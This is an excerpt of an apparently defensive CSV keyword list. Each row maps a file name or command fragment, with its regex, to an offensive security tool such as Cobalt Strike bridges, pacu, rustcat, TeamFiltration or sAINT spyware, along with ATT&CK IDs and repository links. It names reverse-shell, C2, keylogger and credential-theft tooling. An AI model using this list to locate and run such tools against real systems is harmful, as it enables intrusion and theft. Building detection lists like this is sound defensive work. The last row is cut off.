"*output/NonDCWindows7Computers.txt*",".{0,1000}output\/NonDCWindows7Computers\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/PasswordNeverExpire.txt*",".{0,1000}output\/PasswordNeverExpire\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" 
"*output/payloads/*",".{0,1000}output\/payloads\/.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*output/RatChatPT_unix*",".{0,1000}output\/RatChatPT_unix.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","risk of False positive","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*output/RDPMachines.txt*",".{0,1000}output\/RDPMachines\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - 
TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/UsersInDomainAdminsGroup.txt*",".{0,1000}output\/UsersInDomainAdminsGroup\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/UsersLastPasswordChange.txt*",".{0,1000}output\/UsersLastPasswordChange\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/UsersNoPasswordRequired.txt*",".{0,1000}output\/UsersNoPasswordRequired\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/UsersPasswordMustChange.txt*",".{0,1000}output\/UsersPasswordMustChange\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/UsersPasswordNotChanged.txt*",".{0,1000}output\/UsersPasswordNotChanged\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - 
TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/WinRMMachines.txt*",".{0,1000}output\/WinRMMachines\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output: link.bin*",".{0,1000}output\:\slink\.bin.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","false positives expected !","4","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*output: link.dll*",".{0,1000}output\:\slink\.dll.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","false positives expected !","4","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*OutputTokens.txt --onedrive --owa*",".{0,1000}OutputTokens\.txt\s\-\-onedrive\s\-\-owa.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*Out-RundllCommand*",".{0,1000}Out\-RundllCommand.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive 
security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*OverrideLHOST 360.com*",".{0,1000}OverrideLHOST\s360\.com.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","0","N/A","10","10","1223","180","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" "*owa */autodiscover/autodiscover.xml* --recon*",".{0,1000}owa\s.{0,1000}\/autodiscover\/autodiscover\.xml.{0,1000}\s\-\-recon.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. 
less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*OWASP*Amass*",".{0,1000}OWASP.{0,1000}Amass.{0,1000}","offensive_tool_keyword","amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","N/A","Information Gathering","https://github.com/caffix/amass","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*OwnerPersist-POST.*",".{0,1000}OwnerPersist\-POST\..{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*Ox-Bruter.pl*",".{0,1000}Ox\-Bruter\.pl.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl","1","1","N/A","7","10","N/A","N/A","N/A","N/A" "*-p 5000:5000 pador_vuln_server*",".{0,1000}\-p\s5000\:5000\spador_vuln_server.{0,1000}","offensive_tool_keyword","padre","padre is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","0","N/A","8","3","203","20","2024-03-01T14:11:46Z","2019-12-30T13:52:03Z" 
"*P@ss4Hagrid29*",".{0,1000}P\@ss4Hagrid29.{0,1000}","offensive_tool_keyword","DumpAADSyncCreds","C# implementation of Get-AADIntSyncCredentials from AADInternals which extracts Azure AD Connect credentials to AD and Azure AD from AAD connect database.","T1555 - T1110","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Hagrid29/DumpAADSyncCreds","1","0","content","10","1","33","3","2023-06-24T16:17:36Z","2022-03-27T18:43:44Z" "*P0cL4bs*",".{0,1000}P0cL4bs.{0,1000}","offensive_tool_keyword","Github Username","github repo name hosting lots of exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/P0cL4bs","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*p0dalirius/Coercer*",".{0,1000}p0dalirius\/Coercer.{0,1000}","offensive_tool_keyword","ADCSKiller","ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure","T1552.004 - T1003.003 - T1114.002","TA0006 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/grimlockx/ADCSKiller","1","1","N/A","N/A","7","680","69","2023-05-19T17:36:37Z","2023-05-19T06:51:41Z" "*p0dalirius/Coercer*",".{0,1000}p0dalirius\/Coercer.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*p0dalirius/ExtractBitlockerKeys*",".{0,1000}p0dalirius\/ExtractBitlockerKeys.{0,1000}","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - 
T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","10","3","282","39","2024-04-02T18:40:17Z","2023-09-19T07:28:11Z" "*p0dalirius/LDAPWordlistHarvester*",".{0,1000}p0dalirius\/LDAPWordlistHarvester.{0,1000}","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","5","3","288","22","2024-03-14T17:52:34Z","2023-09-22T10:10:10Z" "*p0dalirius/pyLAPS*",".{0,1000}p0dalirius\/pyLAPS.{0,1000}","offensive_tool_keyword","pyLAPS","A simple way to read and write LAPS passwords from linux.","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/p0dalirius/pyLAPS","1","1","N/A","9","1","60","11","2024-03-31T12:13:57Z","2021-10-05T18:35:21Z" "*p0f -i eth* -p*",".{0,1000}p0f\s\-i\seth.{0,1000}\s\-p.{0,1000}","offensive_tool_keyword","p0f","P0f is a tool that utilizes an array of sophisticated purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications","T1046 - T1040","TA0007 - TA0010","N/A","N/A","Sniffing & Spoofing","https://www.kali.org/tools/p0f/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*p0f/p0f.fp*",".{0,1000}p0f\/p0f\.fp.{0,1000}","offensive_tool_keyword","p0f","P0f is a tool that utilizes an array of sophisticated purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications","T1046 - T1040","TA0007 - TA0010","N/A","N/A","Sniffing & Spoofing","https://www.kali.org/tools/p0f/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*P0rtcu11i5!*",".{0,1000}P0rtcu11i5!.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on 
UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","0","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "*p0wnedShell*",".{0,1000}p0wnedShell.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an 'all in one' Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","10","1513","342","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z" "*p0wny-shell*",".{0,1000}p0wny\-shell.{0,1000}","offensive_tool_keyword","p0wny-shell","p0wny@shell:~# is a very basic. single-file. PHP shell. It can be used to quickly execute commands on a server when pentesting a PHP application. 
Use it with caution: this script represents a security risk for the server.","T1059 - T1027 - T1053 - T1035 - T1105","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/flozz/p0wny-shell","1","1","N/A","N/A","10","1987","624","2024-04-29T03:35:22Z","2016-11-09T20:41:01Z" "*p3nt4/Nuages*",".{0,1000}p3nt4\/Nuages.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*P4wnP1*",".{0,1000}P4wnP1.{0,1000}","offensive_tool_keyword","P4wnP1","P4wnP1 is a highly customizable USB attack platform. based on a low cost Raspberry Pi Zero or Raspberry Pi Zero W (required for HID backdoor).","T1200 - T1056.001 - T1059.003 - T1547.001","TA0002 - TA0003 - TA0004","N/A","N/A","Network Exploitation tools","https://github.com/RoganDawes/P4wnP1","1","1","N/A","N/A","10","3933","659","2019-10-31T12:30:16Z","2017-02-22T14:34:09Z" "*P8CuaPrgwBjunvZxJcgq*",".{0,1000}P8CuaPrgwBjunvZxJcgq.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*pack_py_payload*",".{0,1000}pack_py_payload.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*package com.blackh4t*",".{0,1000}package\scom\.blackh4t.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*package externc2*",".{0,1000}package\sexternc2.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from 
Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*package kidlogger*",".{0,1000}package\skidlogger.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*package saint.keylogger*",".{0,1000}package\ssaint\.keylogger.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*package saint.webcam*",".{0,1000}package\ssaint\.webcam.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*package_cvs_into_lse.sh*",".{0,1000}package_cvs_into_lse\.sh.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","3198","550","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z" 
"*package=impacket*",".{0,1000}package\=impacket.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*packer.exe *.exe *.exe*",".{0,1000}packer\.exe\s.{0,1000}\.exe\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","0","N/A","9","1","50","13","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z" "*PackMyPayload.py*",".{0,1000}PackMyPayload\.py.{0,1000}","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","10","8","798","128","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z" "*PackMyPayload-master*",".{0,1000}PackMyPayload\-master.{0,1000}","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense 
Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","10","8","798","128","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z" "*pacman -S hekatomb*",".{0,1000}pacman\s\-S\shekatomb.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/ProcessusT/HEKATOMB","1","0","N/A","10","5","444","48","2024-05-01T06:31:37Z","2022-09-09T15:07:15Z" "*pacman -S rustcat*",".{0,1000}pacman\s\-S\srustcat.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","650","57","2024-04-22T10:43:11Z","2021-06-04T17:03:47Z" "*pacu --exec *",".{0,1000}pacu\s\-\-exec\s.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*pacu --list-modules*",".{0,1000}pacu\s\-\-list\-modules.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*pacu --module-args=*",".{0,1000}pacu\s\-\-module\-args\=.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon 
Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*pacu --module-info*",".{0,1000}pacu\s\-\-module\-info.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*pacu --module-name *",".{0,1000}pacu\s\-\-module\-name\s.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*pacu --session *",".{0,1000}pacu\s\-\-session\s.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*pacu --set-regions *",".{0,1000}pacu\s\-\-set\-regions\s.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*pacu --whoami*",".{0,1000}pacu\s\-\-whoami.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of 
Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*pacu/core pacu*",".{0,1000}pacu\/core\spacu.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*pacu/last_update.txt*",".{0,1000}pacu\/last_update\.txt.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*pacu-master.zip*",".{0,1000}pacu\-master\.zip.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*padlock2john.py*",".{0,1000}padlock2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*padre -u *http*://*",".{0,1000}padre\s\-u\s.{0,1000}http.{0,1000}\:\/\/.{0,1000}","offensive_tool_keyword","padre","padre is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - 
